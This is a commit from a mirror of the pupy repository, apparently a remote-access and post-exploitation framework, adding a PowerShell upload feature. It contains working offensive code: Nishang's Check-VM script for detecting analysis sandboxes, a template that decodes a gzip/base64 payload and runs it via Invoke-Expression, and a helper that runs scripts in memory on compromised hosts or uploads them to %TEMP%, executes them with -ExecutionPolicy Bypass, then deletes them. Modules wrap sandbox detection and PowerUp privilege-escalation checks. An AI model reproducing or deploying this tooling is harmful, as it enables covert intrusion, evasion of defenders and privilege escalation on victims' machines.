mirror of https://github.com/n1nj4sec/pupy.git
adding new feature: powershell upload
This commit is contained in:
parent
d446596063
commit
cb07309a90
|
@ -0,0 +1,303 @@
|
|||
|
||||
|
||||
function Check-VM
|
||||
{
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
Nishang script which detects whether it is in a known virtual machine.
|
||||
|
||||
.DESCRIPTION
|
||||
This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
|
||||
Xen and QEMU for detecting the environment.
|
||||
|
||||
.EXAMPLE
|
||||
PS > Check-VM
|
||||
|
||||
.LINK
|
||||
http://www.labofapenetrationtester.com/2013/01/quick-post-check-if-your-payload-is.html
|
||||
https://github.com/samratashok/nishang
|
||||
|
||||
.NOTES
|
||||
The script draws heavily from checkvm.rb post module from msf.
|
||||
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
|
||||
#>
|
||||
[CmdletBinding()] Param()
|
||||
$ErrorActionPreference = "SilentlyContinue"
|
||||
#Hyper-V
|
||||
$hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
|
||||
if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
|
||||
if (!$hypervm)
|
||||
{
|
||||
$hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
|
||||
if ($hyperv -match "vrtual")
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$hypervm)
|
||||
{
|
||||
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
|
||||
if ($hyperv -match "vrtual")
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$hypervm)
|
||||
{
|
||||
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
|
||||
if ($hyperv -match "vrtual")
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$hypervm)
|
||||
{
|
||||
$hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($hypervm)
|
||||
{
|
||||
|
||||
"This is a Hyper-V machine."
|
||||
|
||||
}
|
||||
|
||||
#VMWARE
|
||||
|
||||
$vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
|
||||
{
|
||||
$vmwarevm = $true
|
||||
}
|
||||
|
||||
if (!$vmwarevm)
|
||||
{
|
||||
$vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
|
||||
if ($vmware -match "vmware")
|
||||
{
|
||||
$vmwarevm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$vmwarevm)
|
||||
{
|
||||
$vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
|
||||
if ($vmware -match "vmware")
|
||||
{
|
||||
$vmwarevm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$vmwarevm)
|
||||
{
|
||||
$vmware = Get-Process
|
||||
if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
|
||||
{
|
||||
$vmwarevm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($vmwarevm)
|
||||
{
|
||||
|
||||
"This is a VMWare machine."
|
||||
|
||||
}
|
||||
|
||||
#Virtual PC
|
||||
|
||||
$vpc = Get-Process
|
||||
if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
|
||||
{
|
||||
$vpcvm = $true
|
||||
}
|
||||
|
||||
if (!$vpcvm)
|
||||
{
|
||||
$vpc = Get-Process
|
||||
if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
|
||||
{
|
||||
$vpcvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$vpcvm)
|
||||
{
|
||||
$vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
|
||||
{
|
||||
$vpcvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($vpcvm)
|
||||
{
|
||||
|
||||
"This is a Virtual PC."
|
||||
|
||||
}
|
||||
|
||||
|
||||
#Virtual Box
|
||||
|
||||
$vb = Get-Process
|
||||
if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
|
||||
{
|
||||
|
||||
$vbvm = $true
|
||||
|
||||
}
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
|
||||
if ($vb -match "vbox_")
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
|
||||
if ($vb -match "vbox_")
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
|
||||
if ($vb -match "vbox")
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
|
||||
if ($vb -match "vbox")
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($vbvm)
|
||||
{
|
||||
|
||||
"This is a Virtual Box."
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
#Xen
|
||||
|
||||
$xen = Get-Process
|
||||
|
||||
if ($xen -eq "xenservice.exe")
|
||||
{
|
||||
|
||||
$xenvm = $true
|
||||
|
||||
}
|
||||
|
||||
if (!$xenvm)
|
||||
{
|
||||
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
|
||||
if ($xen -match "xen")
|
||||
{
|
||||
$xenvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$xenvm)
|
||||
{
|
||||
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
|
||||
if ($xen -match "xen")
|
||||
{
|
||||
$xenvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$xenvm)
|
||||
{
|
||||
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
|
||||
if ($xen -match "xen")
|
||||
{
|
||||
$xenvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if (!$xenvm)
|
||||
{
|
||||
$xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
|
||||
{
|
||||
$xenvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if ($xenvm)
|
||||
{
|
||||
|
||||
"This is a Xen Machine."
|
||||
|
||||
}
|
||||
|
||||
|
||||
#QEMU
|
||||
|
||||
$qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
|
||||
if ($qemu -match "qemu")
|
||||
{
|
||||
|
||||
$qemuvm = $true
|
||||
|
||||
}
|
||||
|
||||
if (!$qemuvm)
|
||||
{
|
||||
$qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
|
||||
if ($qemu -match "qemu")
|
||||
{
|
||||
$qemuvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($qemuvm)
|
||||
{
|
||||
|
||||
"This is a Qemu machine."
|
||||
|
||||
}
|
||||
}
|
||||
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,20 @@
|
|||
# -*- coding: UTF8 -*-
|
||||
from pupylib.PupyModule import *
|
||||
import os
|
||||
from modules.lib.windows.powershell_upload import execute_powershell_script
|
||||
|
||||
__class_name__="CheckVM"
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
|
||||
|
||||
@config(compat="windows", category="gather")
|
||||
class CheckVM(PupyModule):
|
||||
""" check if running on Virtual Machine """
|
||||
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog="CheckVM", description=self.__doc__)
|
||||
|
||||
def run(self, args):
|
||||
content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
|
||||
function = 'Check-VM'
|
||||
output = execute_powershell_script(self, content, function)
|
||||
self.success("Output of the script: \n%s" % output)
|
|
@ -0,0 +1,10 @@
|
|||
$base64 = "[BASE64]"
|
||||
$data = [System.Convert]::FromBase64String($base64)
|
||||
$ms = New-Object System.IO.MemoryStream
|
||||
$ms.Write($data, 0, $data.Length)
|
||||
$ms.Seek(0,0) | Out-Null
|
||||
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
|
||||
$sr = New-Object System.IO.StreamReader($cs)
|
||||
$t = $sr.readtoend()
|
||||
Invoke-Expression $t
|
||||
Invoke-Expression [FUNCTION_NAME]
|
|
@ -0,0 +1,54 @@
|
|||
from rpyc.utils.classic import upload
|
||||
import base64
|
||||
import tempfile
|
||||
import gzip
|
||||
import StringIO
|
||||
import subprocess
|
||||
import os
|
||||
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "..", ".."))
|
||||
|
||||
def execute_powershell_script(module, content, function):
|
||||
template = open(os.path.join(ROOT, "modules", "lib", "utils", "upload_powershell_script_template.ps1"), 'r').read()
|
||||
|
||||
# compress the content of the script to upload
|
||||
out = StringIO.StringIO()
|
||||
with gzip.GzipFile(fileobj=out, mode="w") as f:
|
||||
f.write(content)
|
||||
|
||||
# encode the gzip content in base64
|
||||
encoded = base64.b64encode(out.getvalue())
|
||||
|
||||
# replace meta data from the template
|
||||
template = template.replace('[BASE64]', encoded)
|
||||
template = template.replace('[FUNCTION_NAME]', function)
|
||||
|
||||
output = ""
|
||||
# execute of the powershell script in memory if the size is lower of the max size
|
||||
if len(template) < 32710:
|
||||
module.success("Executing the powershell code on memory")
|
||||
cmd = []
|
||||
cmd.append('powershell.exe')
|
||||
cmd.append('/c')
|
||||
cmd.append(template)
|
||||
output = module.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, universal_newlines=True)
|
||||
else:
|
||||
tf = tempfile.NamedTemporaryFile()
|
||||
f = open(tf.name, 'w')
|
||||
f.write(template)
|
||||
f.close()
|
||||
|
||||
remoteTempFolder = module.client.conn.modules['os.path'].expandvars("%TEMP%")
|
||||
tfName = tf.name.split(os.sep)
|
||||
tfName = tfName[len(tfName)-1]
|
||||
|
||||
module.success("Uploading powershell code to: %s\%s.ps1" % (remoteTempFolder, tfName))
|
||||
upload(module.client.conn, tf.name, module.client.conn.modules['os.path'].join(remoteTempFolder, '%s.ps1' % tfName))
|
||||
|
||||
module.success("Executing the powershell code")
|
||||
output = module.client.conn.modules.subprocess.check_output("PowerShell.exe -ExecutionPolicy Bypass -File %s.ps1"%(module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
|
||||
module.success("Removing the powershell code")
|
||||
module.client.conn.modules.subprocess.check_output("cmd.exe del %s.ps1" % (module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
|
||||
return output
|
|
@ -0,0 +1,26 @@
|
|||
# -*- coding: UTF8 -*-
|
||||
from pupylib.PupyModule import *
|
||||
import os
|
||||
from modules.lib.windows.powershell_upload import execute_powershell_script
|
||||
|
||||
__class_name__="PowerUp"
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
|
||||
|
||||
@config(compat="windows", category="admin")
|
||||
class PowerUp(PupyModule):
|
||||
""" trying common Windows privilege escalation methods"""
|
||||
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog="PowerUp", description=self.__doc__)
|
||||
|
||||
def run(self, args):
|
||||
content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read()
|
||||
|
||||
# launch all PowerUp checks
|
||||
function = 'Invoke-AllChecks'
|
||||
|
||||
output = execute_powershell_script(self, content, function)
|
||||
|
||||
# parse output depending on the PowerUp output
|
||||
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
|
||||
self.success("Output of the script: \n%s" % output)
|
Loading…
Reference in New Issue